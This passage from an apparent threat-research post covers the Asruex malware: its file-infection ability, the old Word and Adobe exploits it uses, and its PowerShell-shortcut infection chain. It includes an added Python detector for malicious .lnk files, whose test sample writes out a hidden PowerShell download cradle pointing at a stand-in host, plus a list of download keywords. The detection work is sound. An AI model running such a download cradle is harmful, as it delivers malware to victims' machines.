By Ian Mercado and Mhica Romero
Since it first emerged in 2015, Asruex has been known for its backdoor capabilities and its connection to the spyware DarkHotel. However, when we encountered Asruex in a PDF file, we found that a variant of the malware can also act as an infector, particularly by exploiting the old vulnerabilities CVE-2012-0158 and CVE-2010-2883, which let it inject code into Word and PDF files respectively.
The use of old, patched vulnerabilities suggests that the variant was devised knowing that it can still affect targets running older versions of Adobe Reader (versions 9.x before 9.4) and Acrobat (versions 8.x before 8.2.5) on Windows and Mac OS X.
Because this infection capability is unusual for Asruex, security researchers might not think to check files for an Asruex infection and may keep watching exclusively for its backdoor behavior. Awareness of this new infection method could help users defend against the malware variant.
Asruex infects a system through a shortcut file that contains a PowerShell download script, and spreads through removable drives and network drives. The diagram below illustrates the malware’s infection chain.
Figure 1. Infection chain of Asruex
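As an added example, not code from the original post, the following Python detector targets the shortcut stage of this chain: it parses the StringData section of a .lnk file, flags shortcuts that launch PowerShell with a download keyword, and walks a removable or network drive for such files. The header layout follows MS-SHLLINK; the download keywords and the sample shortcuts are constructed assumptions, since the post does not quote the script itself.

```python
import struct
from pathlib import Path

# MS-SHLLINK layout assumed: 76-byte header with LinkFlags at offset 20.
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"), (0x20, "arguments"))
# Heuristic download-cradle keywords (assumption; the post does not quote the script).
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "webclient")

def lnk_strings(data: bytes) -> dict:
    """Parse the StringData section (name, relative path, working dir, arguments) of a .lnk."""
    out = {}
    if len(data) < 76 or data[:4] != b"L\x00\x00\x00":
        return out
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_ID_LIST:                       # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    for flag, name in STRING_FIELDS:
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            pos += 2 + count * width
            out[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return out

def is_suspicious_shortcut(data: bytes) -> bool:
    """True if the shortcut launches PowerShell with a download keyword in its command line."""
    s = lnk_strings(data)
    text = (s.get("relative_path", "") + " " + s.get("arguments", "")).lower()
    return "powershell" in text and any(m in text for m in DOWNLOAD_MARKERS)

def scan_for_shortcuts(root: str) -> list:
    """Walk a removable or network drive and list .lnk files matching the heuristic."""
    hits = []
    for p in Path(root).rglob("*.lnk"):
        try:
            if is_suspicious_shortcut(p.read_bytes()):
                hits.append(str(p))
        except OSError:
            continue
    return hits

def build_lnk(relative_path: str, arguments: str) -> bytes:
    # Constructed test sample: a minimal Unicode .lnk carrying only RelativePath and Arguments.
    header = b"L\x00\x00\x00" + bytes(16) + struct.pack("<I", 0x08 | 0x20 | IS_UNICODE) + bytes(52)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relative_path, arguments))
    return header + body

# Constructed samples (not from the post): a PowerShell download cradle and a benign document link.
SAMPLE_BAD = build_lnk(r"..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       "-nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/a','a.exe')\"")
SAMPLE_OK = build_lnk(r"..\Documents\report.pdf", "")
```

Run `scan_for_shortcuts("E:\\")` (or a mounted share path) to list matching shortcuts; the keyword list is a starting point and should be tuned to local telemetry.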
Infected PDF files
We first encountered this variant as a PDF file. Further investigation revealed that the PDF file itself was not a malicious file created by ..